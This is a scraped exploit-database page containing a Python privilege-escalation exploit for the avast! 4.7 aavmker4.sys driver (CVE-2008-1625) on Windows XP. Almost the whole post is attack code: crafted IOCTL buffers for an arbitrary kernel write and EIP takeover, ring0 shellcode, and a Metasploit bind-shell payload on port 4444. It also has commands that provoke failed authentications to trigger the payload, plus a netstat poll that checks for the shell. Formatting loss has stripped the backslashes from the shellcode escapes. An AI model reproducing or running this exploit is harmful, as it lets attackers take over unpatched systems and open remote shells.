Avast! 4.7 aavmker4.sys privilege escalation
Posted on 27 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Avast! 4.7 aavmker4.sys privilege escalation</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================ Avast! 4.7 aavmker4.sys privilege escalation ============================================ #!/usr/bin/python # avast! 4.7 aavmker4.sys privilege escalation # http://www.trapkit.de/advisories/TKADV2008-002.txt # CVE-2008-1625 # Tested on WindXpSp2/Sp3 Dep ON # Matteo Memelli ryujin __A-T__ offensive-security.com # www.offensive-security.com # Spaghetti & Pwnsauce - 17/04/2010 # Tested on WinXPSP2/SP3 english | avast! 4.7.1098.0 from ctypes import * import time, struct, sys, thread, os kernel32 = windll.kernel32 Psapi = windll.Psapi def findSysBase(drv): print "(+) Retrieving %s base address..." % drv ARRAY_SIZE = 1024 myarray = c_ulong * ARRAY_SIZE lpImageBase = myarray() cb = c_int(1024) lpcbNeeded = c_long() drivername_size = c_long() drivername_size.value = 48 Psapi.EnumDeviceDrivers(byref(lpImageBase), cb, byref(lpcbNeeded)) for baseaddy in lpImageBase: drivername = c_char_p("x00"*drivername_size.value) if baseaddy: Psapi.GetDeviceDriverBaseNameA(baseaddy, drivername, drivername_size.value) if drivername.value.lower() == drv: print "(+) Address retrieved: %s" % hex(baseaddy) return baseaddy return None def checkShell(): check = "netstat -an | find "4444"" res = os.popen(check) ret = res.read() res.close() if ret.find("0.0.0.0:4444") != -1: return True else: return False def kickLsass(): time.sleep(10) lsas1 = "echo hola | runas /user:administrator cmd.exe > NUL" lsas2 = "net use \\127.0.0.1 /user:administrator test > NUL" nc = "nc 127.0.0.1 4444" print "(!) NO BSOD? good sign :)" print "(*) Sleeping 60 secs before the Woshi finger hold..." time.sleep(60) # Trying to kick ls-ass, any auth good or failed should help # if this doesn't work for you try to rdp to the vuln box or # logout/login from console... it's rough but should work ;) print "(+) Trying to fail an auth to trigger syscall..." os.system(lsas1) time.sleep(1) os.system(lsas2) while 1: res = checkShell() if res: print "($) Shell is ready 0.0.0.0:4444" #os.system(nc) #print "(-) netcat not in path but shell is open!" break print "(*) Retrying. Sleeping 30 secs..." time.sleep(30) print "(+) Trying to fail an auth to trigger syscall..." os.system(lsas1) time.sleep(1) os.system(lsas2) def pwnDrv(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output, out_size, dwReturn1): # We trigger func pointer to control EIP time.sleep(5) print "(+) Owning EIP..." for i in range(1,3): print "(+) Triggering function pointer: %d/2" % i dev_ioctl = kernel32.DeviceIoControl(driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output, out_size, byref(dwReturn1), None) time.sleep(0.5) if __name__ == '__main__': print "(*) avast! 4.7 aavmker4.sys privilege escalation" print "(+) coded by Matteo Memelli aka ryujin -> at <- offsec.com" print "(+) www.offsec.com || Spaghetti & Pwnsauce" print "(+) tested on WinXPSP2/SP3 DEP On 17/04/2010" GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 CREATE_ALWAYS = 0x2 IOCTL_STOR = 0xb2d6001c # stores stuff to bypass checks in .data IOCTL_VULN = 0xb2d60030 # writes to arbitrary memory IOCTL_EIP = 0xb2d60020 # triggers function pointer to own EIP # DosDevicesAAVMKER4 DeviceAavmKer4 DEVICE_NAME = "\\.\AavmKer4" dwReturn1 = c_ulong() dwReturn2 = c_ulong() evil_size = 0x878 out_size = 0x1024 stor_size = 0x418 evil_output = "" stor_output = "" driver_name = 'aavmker4.sys' # evil_input = 0x878 # Payload = 496 bytes # ring0_migrate = 45 bytes || # xf0x01 bytes to copy ring0_migrate = ( "xfcxfaxebx24x5ex68x76x01x00x00x59x0fx32x89x86x69" "x00x00x00x8bxbex6dx00x00x00x89xf8x0fx30xb9xf0x01" "x00x00xf3xa4xfbxf4xebxfdxe8xd7xffxffxff" ) # ring0_msr = 117 bytes ring0_msr = ( "x6ax00x9cx60xe8x00x00x00x00x58x8bx98x60x00x00x00" "x89x5cx24x24x81xf9xdexc0xadxdex75x10x68x76x01x00" "x00x59x89xd8x31xd2x0fx30x31xc0xebx3ax8bx32x0fxb6" "x1ex66x81xfbxc3x00x75x2ex8bx98x68x00x00x00x8dx9b" "x75x00x00x00x89x1axb8x01x00x00x80x0fxa2x81xe2x00" "x00x10x00x74x11xbax00xffx3fxc0x81xc2x04x00x00x00" "x81x22xffxffxffx7fx61x9dxc3xffxffxffxffx00x04xdf" "xffx00x04xfex7f" ) # ring3_stager = 61 bytes ring3_stager = ( "x60x6ax30x58x99x64x8bx18x39x53x0cx74x2ex8bx43x10" "x8bx40x3cx83xc0x28x8bx08x03x48x03x81xf9x6cx61x73" "x73x75x18xe8x0ax00x00x00xe8x10x00x00x00xe9x09x00" "x00x00xb9xdexc0xadxdex89xe2x0fx34x61xc3" ) # msf payload: bindshell port 4444 318 bytes ring3_shellcode = ( "xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45" "x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49" "x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d" "x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66" "x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61" "xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40" "x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32" "x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6" "x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09" "xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0" "x66x68x11x5cx66x53x89xe1x95x68xa4x1ax70xc7x57xff" "xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53" "x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff" "xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64" "x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89" "xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab" "xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51" "x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53" "xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6" "x52xffxd0x68xefxcexe0x60x53xffxd6xffxd0xc3" ) sysbase = findSysBase(driver_name) if not sysbase: print "(-) Couldn't retrieve driver base address, exiting..." sys.exit() driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, CREATE_ALWAYS, 0, None) driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, CREATE_ALWAYS, 0, None) # .data memory area we write to; offset from base = 0x2e04 read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data # r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop r0_address = struct.pack('L', sysbase+0x23fa) evil_input = r0_address*2 + "x90"*0x102 evil_input += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode evil_input += "x41"*0x549 evil_input += read_data_from + "x42x42x42x42" # bypass input checks stor_input = "x43x43x43x43" # padding stor_input += "x07xADxDExD0" # cmp dword ptr [eax], 0D0DEAD07h stor_input += "xBAxD0xBAx10" # cmp dword ptr [eax+4], 10BAD0BAh stor_input += "x44x44x44x44"*2 # After arbitrary write to memory nt!KeSetEvent is called: we need to fix # nt!KeSetEvent+0x32 using any addy pointing to value different to 0x01 # so we can use our "read_data_from" again. stor_input += read_data_from stor_input += "x44x44x44x44" # 0x2300 offset from base: we write here to control a function pointer # and own EIP stor_input += struct.pack('L', sysbase+0x2300) + "x45"*414 # trigger these later on... thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size, stor_output, out_size, dwReturn1)) thread.start_new(kickLsass, ()) ########################################################################### # And now let's own the boy: if driver_handle1: # We store values to overcome input checks print "(+) Storing our precious in kernel space ;) ..." dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input, stor_size, stor_output, out_size, byref(dwReturn1), None) # We trigger arbitrary write print "(*) Sending evil IOCTL..." print "(+) Pwnage in progress...." dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN, evil_input, evil_size, evil_output, evil_size, byref(dwReturn2), None) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-27]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
